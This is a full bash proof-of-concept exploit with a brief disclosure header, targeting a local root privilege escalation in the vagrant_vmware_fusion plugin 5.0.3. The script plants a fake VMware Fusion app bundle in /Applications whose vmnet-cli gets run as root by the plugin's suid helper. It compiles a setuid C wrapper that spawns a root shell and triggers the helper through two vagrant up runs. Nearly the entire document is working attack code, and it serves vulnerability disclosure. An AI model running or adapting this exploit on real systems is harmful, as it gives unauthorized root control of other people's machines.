# Another day, another root privesc bug in this plugin. Not quite so serious this
# time - this one is only exploitable if the user has the plugin installed but
# VMware Fusion *not* installed. This is a fairly unlikely scenario but it's a
# straight to root privesc with no user interaction so it isn't the kind of thing
# that should be shipping with any software.
#
# This occurs because the suid root sudo helper that I have discussed in previous
# exploit writeups executes /Applications/VMware Fusion.app/Contents/Library/vmnet-cli
# as root, but if the application isn't installed and we're a local admin user
# (the admin group can write to /Applications) we can create a fake app directory
# with a payload in place of vmnet-cli that gets executed as root.
#
# HashiCorp fixed this (very quickly) in 5.0.4.
#
# https://m4.rkw.io/vagrant_vmware_privesc_5.0.3.sh.txt
# 3c11083386b3f7352d60b327190eed4364383c0622351db5410d809f4bda746a
#
# ------------------------------------------------------------------------------

#!/bin/bash

echo
echo "#########################################################"
echo "# vagrant_vmware_fusion plugin 5.0.3 local root privesc #"
echo "# by m4rkw - https://m4.rkw.io/blog.html                #"
echo "#########################################################"
echo "# Note: only works when VMWare Fusion is not installed. #"
echo "#########################################################"
echo

# Kill any vagrant processes we started and remove the fake app bundle and the
# scratch project directory.
cleanup() {
  exec 2> /dev/null
  killall -9 vagrant 1>/dev/null 2>/dev/null
  kill -9 $(ps auxwww |egrep '\/vagrant up$' |xargs -L1 |cut -d ' ' -f2) &>/dev/null
  exec 2> /dev/tty
  cd
  rm -rf .vagrant_vmware_fusion_503_exp
  rm -rf /Applications/VMware\ Fusion.app
}

# If the real app is present the helper runs the genuine vmnet-cli, so there is
# nothing to hijack.
if [ -e "/Applications/VMware Fusion.app" ] ; then
  echo "Fusion is installed, not exploitable."
  exit 1
fi

echo "setting up fake app directory..."

# /Applications is group-writable by admin, so no privileges are needed here.
mkdir /Applications/VMware\ Fusion.app

if [ ! $? -eq 0 ] ; then
  echo "Failed to create /Applications/VMware Fusion.app."
  exit 1
fi

# Minimal bundle layout: the plugin looks for these binaries before it will
# talk to the sudo helper.
mkdir -p /Applications/VMware\ Fusion.app/Contents/Library/services
touch /Applications/VMware\ Fusion.app/Contents/Library/vmrun
touch /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services
chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmrun
chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services

# Fake vmware-vmx that answers the plugin's version probe on stderr.
cat > /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx <<EOF
#!/bin/bash
echo 1>&2
echo "VMware Fusion Information:" 1>&2
echo "VMware Fusion 10.0.1 build-6754183 Release" 1>&2
echo
EOF

chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx

# Fake vmnet-cli: this is what the suid helper executes as root. It just makes
# our compiled payload setuid root.
cat > /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli <<EOF
#!/bin/bash
chown root:wheel /tmp/vvp_503
chmod 4755 /tmp/vvp_503
EOF

chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli

echo "compiling payload..."

# Setuid wrapper: set the real uid to 0 (bash drops a bare euid 0), delete
# itself and hand over a root shell.
cat > /tmp/vvp_503.c <<EOF
#include <unistd.h>

int main() {
  setuid(0);
  seteuid(0);
  execl("/bin/bash","bash","-c","rm -f /tmp/vvp_503; /bin/bash",NULL);
  return 0;
}
EOF

gcc -o /tmp/vvp_503 /tmp/vvp_503.c
rm -f /tmp/vvp_503.c

cd
mkdir .vagrant_vmware_fusion_503_exp
cd .vagrant_vmware_fusion_503_exp

echo "writing dummy vagrantfile ..."

cat > vagrantfile <<EOF
Vagrant.configure('2') do |config|
  config.vm.box = 'envimation/ubuntu-xenial'
end
EOF

echo "triggering vagrant up [stage 1]..."

# Stage 1 just makes vagrant create the .vagrant/machines state directory;
# it fails because there is no real Fusion, so wait for it to exit.
vagrant up &>/dev/null &

while :
do
  r=$(ps auxwww |grep 'vagrant up' |grep -v grep)
  if [ "$r" == "" ] ; then
    break
  fi
  sleep 0.5
done

echo "dropping dummy machine..."

# Plant an empty .vmx and point the machine id at it so that the second run
# thinks a VM exists and goes down the networking path that calls vmnet-cli.
uuid=$(ls -1 .vagrant/machines/default/vmware_fusion |grep -v vagrant_cwd)
touch .vagrant/machines/default/vmware_fusion/$uuid/ubuntu-xenial-vmware-fusion.vmx
echo -n "$(pwd)/.vagrant/machines/default/vmware_fusion/$uuid/ubuntu-xenial-vmware-fusion.vmx" > .vagrant/machines/default/vmware_fusion/id

echo "triggering vagrant up [stage 2]..."

vagrant up &>/dev/null &

echo "waiting for payload to trigger ..."

count=0
success=0

while :
do
  # ls separates the columns with a variable number of spaces, so match them
  # with a regex rather than a fixed string.
  r=$(ls -la /tmp/vvp_503 2>/dev/null |grep -E -- '^-rwsr-xr-x +1 +root +wheel')
  if [ "$r" != "" ] ; then
    success=1
    break
  fi
  r=$(ps auxwww |grep 'vagrant up' |grep -v grep)
  if [ "$r" == "" ] ; then
    break
  fi
  sleep 0.2
  count=$(($count + 1))
  if [ $count -eq 250 ] ; then
    echo "Timed out waiting for the payload to trigger."
    cleanup
    exit 1
  fi
done

cleanup

if [ ! $success -eq 1 ] ; then
  echo "exploit failed."
  exit 1
fi

echo
cd
/tmp/vvp_503